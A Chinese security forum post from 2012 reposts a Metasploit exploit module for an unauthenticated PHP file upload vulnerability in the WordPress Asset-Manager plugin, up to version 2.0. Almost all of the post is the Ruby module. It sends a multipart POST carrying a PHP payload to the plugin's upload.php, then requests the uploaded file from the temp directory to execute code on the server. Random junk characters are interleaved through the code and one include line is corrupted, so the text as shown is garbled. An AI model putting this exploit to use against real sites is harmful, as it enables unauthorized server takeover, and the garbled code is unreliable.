找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2038|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
2 {* Y" N- ~5 w* y- e0 E# y/ w/ x. ?& F
##) Z5 u# B. c: u9 n
# This file is part of the Metasploit Framework and may be subject to/ X4 f2 ?& O% q+ l
# redistribution and commercial restrictions. Please see the Metasploit5 a& B- v6 K$ b) @  X$ o+ T
# Framework web site for more information on licensing and terms of use.
) }  N( w0 Q5 @#   http://metasploit.com/framework/
0 H/ {; J. i- ]9 @. C- ~' |% \, o##) n2 e! u  j6 x( e+ i/ ^

1 w2 T1 e$ {, d( H) h$ h7 |* E6 Arequire 'msf/core'
( Z+ A5 ~$ L! t& Orequire 'msf/core/exploit/php_exe'
" U$ j( Z" s8 g/ z" S5 G- T  `" V
2 b; C: G6 K8 m: c, }" Y( `7 zclass Metasploit3 < Msf::Exploit::Remote
  M, Z+ Z2 j5 J) m  Rank = ExcellentRanking, K1 u2 }8 W! Y3 Y0 z, B& D

) w, e6 ?2 p" a, Y% f, g" {  include Msf::Exploit::Remote::HttpClient
; z9 r/ B6 v0 a' F4 _. G* o  include Msf::Exploit:hpEXE
4 l- L  [( {" \# b8 w: b+ x $ L& _' E6 x' G- t
  def initialize(info = {})/ [5 Q9 }" C0 c7 p6 k( i$ T6 Y
    super(update_info(info,
( h3 f$ D7 A- X, ]      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',2 x$ X# m& q# O  T( p
      'Description'    => %q{  G0 K7 R% Y3 j5 u: D0 U
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress( _: u! [5 b/ c: A! M: E6 O
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
% `2 _9 H' W9 u( G! I* v7 n        temp directory without authentication, which results in arbitrary code execution.
: n8 ~! v, U) h& Y1 |4 V$ q. f      },  u9 `; u8 x  S$ X
      'Author'         =>( ]/ T/ E4 Z- Y' j. W5 U
        [4 z" v4 D" N$ p
          'Sammy FORGIT', # initial discovery* L, w' d$ {: ]/ C3 ?) R
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module( R6 u$ z7 S; D0 u) a0 z% t7 m0 @
        ],
, A, Z! i3 w( C% A! \. \" k      'License'        => MSF_LICENSE,
% M, }! @1 t9 a; \      'References'     =>
5 a  T4 M0 t' v1 H2 D! I        [- Y/ U: S" N3 o) h
          [ 'OSVDB', '82653' ],* A7 N7 v( b( u  [0 ]
          [ 'BID', '53809' ],% I! ^6 w9 V1 [- a& s* h
          [ 'EDB', '18993' ],1 ~1 ]' K$ H( m# D2 \8 z# d1 M# `
          [ 'URL', 'http:// www.myhack58.com /' ]
# O6 L4 v* q) x1 U" ?        ],* |) u& C% k: l9 u
      'Payload'       =>
% F) _: i" t0 g, Z        {
3 O# Y: `9 q* [9 |, K          'BadChars' => "\x00",8 _6 H1 U5 [' F' P
        },
, m: A7 k0 Q) Z0 p$ l      'Platform'       => 'php',6 u6 M9 O- ]! ^, Z
      'Arch'           => ARCH_PHP,
6 r$ H! I% Y5 k1 ?' `% I( {( o3 n      'Targets'        =>
# B, d6 I4 [- ]# O+ H        [
4 \3 a! ]  ]* i5 y          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
8 V0 I: X. U# K4 ?          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
( J9 X5 z9 o* d        ],$ k/ B+ ?0 a; w, V9 d
      'DefaultTarget' => 0,9 X4 Q( u7 C) I' n- D  B: F
      'DisclosureDate' => 'May 26 2012'))
$ m# `6 m% k+ e$ A ; S: ^/ E: h2 l+ A
    register_options(+ t+ {5 M: w" w
      [
3 ?. l0 w0 q; ?- x7 z/ g        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])4 m$ A1 ]7 \. ~: ~: g$ p1 x
      ], self.class). k8 R4 n# ~3 {: n
  end
1 S1 H6 M" \( ^, D0 } 3 X2 Y5 z8 J2 R) J  ~- K, D
  def exploit8 L) I8 B* J) _7 U
    uri =  target_uri.path
1 d) i, K1 P3 A" X% X% U    uri << '/' if uri[-1,1] != '/'
( g% r  @1 i) Y9 ~) {    peer = "#{rhost}:#{rport}"
# O( D$ {8 I: m+ ?0 [    payload_name = "#{rand_text_alpha(5)}.php"! J4 t5 L# W" P; x; D6 }
    php_payload = get_write_exec_payload(:unlink_self=>true)
- R4 g# n/ B; _9 Z. m
( @5 x7 Y3 g  m    data = Rex::MIME::Message.new3 U+ {  r6 Z, s- R: V' z5 o
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")) P8 X( R% r8 u, D+ a2 F
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
6 }0 i' ~+ B; t; P7 h, V- Y6 g- O
6 l( t  K7 s7 J0 R8 u5 S2 H) o    print_status("#{peer} - Uploading payload #{payload_name}"): D, B/ _$ U4 B! A) L! }  \& ?) S8 ?
    res = send_request_cgi({
: t1 o0 J. v+ I2 F* u3 Y      'method'  => 'POST',6 p+ A& M& P' x
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
/ r( {" A6 C( F3 V+ p      'ctype'   => "multipart/form-data; boundary=#{data.bound}",6 K# _2 {5 |; d6 v
      'data'    => post_data) ?0 K( }$ C5 }& d$ C- \3 v
    })$ P/ G. E# z3 n! E9 a! X

: R* T1 y* X8 {; h/ M( j& d    if not res or res.code != 200 or res.body !~ /#{payload_name}/
) k9 S0 N8 x- O2 O+ b/ I7 r; D" R      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; S9 ^7 a7 V( j5 qend
  s1 A+ ]5 v+ P+ L- p1 e( ~% g: K 9 ~' F9 q# p' X5 H( v
    print_status("#{peer} - Executing payload #{payload_name}")5 ?, p% G8 c) {6 G; Z8 ]
    res = send_request_raw({2 x3 B/ v3 ~2 A3 |5 h% [0 b+ Y
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
: ~8 w$ c" I! P/ @. E/ s  ?      'method'  => 'GET'- @! p$ q$ {" j! Y3 o
    })" T' a/ c, ~/ t, {5 b& s3 r
6 M- Y) I# y; _- e
    if res and res.code != 200
% L' D3 U- Z/ Q) ]- i) W      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")+ `! l. d6 L& C; L! K: Z8 u7 e. i
    end
- [3 K, \! J1 c9 ]; p! `2 z& d  end7 `/ {4 v: P8 F  c; r0 {; K
end
) D- Q9 s% p' r' k, N" C" S
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表